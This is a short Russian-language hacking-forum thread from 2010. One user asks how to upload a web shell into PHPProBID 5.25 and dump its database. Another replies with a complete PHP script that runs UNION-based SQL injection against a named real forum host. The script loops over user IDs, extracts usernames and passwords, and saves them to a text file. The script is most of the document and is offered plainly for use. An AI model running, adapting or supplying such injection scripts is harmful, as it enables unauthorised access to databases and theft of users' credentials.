PHPProBID

Discussion in 'Песочница' started by Gerceg, 31 Mar 2010.

  1. Gerceg

    Gerceg New Member

    Joined:
    9 Feb 2009
    Messages:
    31
    Likes Received:
    0
    Reputations:
    -5
    Парни подскажите как в эту CMS залить шелл.Актуально версия 5.25.Или как в админке можно сдампить всю БД.Вроде рылся и ни че не нашел.
    И еще вопрос.
    Парни скажите ка ксдампить полностью БД.
     
    #1 Gerceg, 31 Mar 2010
    Last edited: 31 Mar 2010
  2. longer

    longer New Member

    Joined:
    26 Aug 2009
    Messages:
    1
    Likes Received:
    0
    Reputations:
    0


    <?
    /*************************************************
    * 15.02.2007 22:00-23:12 *
    * супер пупер скрипт для вытаскивания баз *
    * *
    * *
    * (c)одед бай cRiLaZ *
    * (GraBBerZ TeaM) *
    * *
    * Приват в МИР!!!!!!!!! *
    * протева закрытых сорцов ;) *
    ************************************************/
    /*конфиг*/
    $host="forum.tomsk.ru"; #хост
    $how_much=4; # скока раз повторять цикл
    /*функция, пишущая в файл sql.txt*/
    function input_into($text)
    {
    $a_file=fopen("./sql.txt","a+");
    fputs($a_file,"$text");
    fclose($a_file);
    }
    /*собсно цикл*/
    for($q=1;$q<=$how_much;$q++)
    {
    /*сдесь все, что после хоста*/
    $string_query="forum.php?a=24&user_id=-1+UNION+SELECT+1,CONCAT(CHAR(45,45,45),user_name,C HAR(45,45),user_pass,CHAR(45,45,45)),null,null,nul l,null,null,null,null,null+FROM+forum_user+WHERE+i d=$q/* HTTP/1.0\n\n";
    /*формируем запрос к серву, в разных скулях тут по разному нада поставить*/
    $request ="GET http://".$host."/".$string_query." HTTP/1.1\n";
    $request.="Host: ".$host."\n";
    $request.="User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.8.0.2) Gecko/20060308 Firefox/1.5.0.2\n";
    $request.="Connection: keep-alive\n";
    /*открываем сокет*/
    $soket=fsockopen($host,80,$errno,$errstr,13); #13 )))
    fwrite($soket,$request); #пишем в сокет
    while(!feof($soket)){ #
    $content.=fgets($soket);}#читаем
    fclose($soket); #закрываем
    /*регулярка*/
    ereg("(---(.*)---)",$content,$infa);
    /*пишем в файл результаты*/
    input_into("$q)".$infa[0]."\n");
    /*обнуляем все, ваще то нада тока контент, но мы же примерные*/
    $content="";
    $params="";
    $request="";
    }

    /*************************************************
    * а это для тех, кто в доспехах ;)
    * в общем регулярка думаю все понятно
    * "---" - это начало и конец строки,
    * "(.*)" - это любые значения.
    * Т.е. в массив будет попадать все следующего вида
    * "---login:pwd:mail---", если канешна в пассе, логине и т.д. нету "---".
    * Ну наверно все, скуль для испытаний я взял у [sql].
    * Просьба нащет орфографии не че не писать!!!
    * Пешу так спициальна по своим соображениям! ;)
    ************************************************/
    ?>
     
    #2 longer, 31 Mar 2010
(You must log in or sign up to post here.)
Language
English (US)
    ANTICHAT ™ © 2001-2027 Antichat Kft.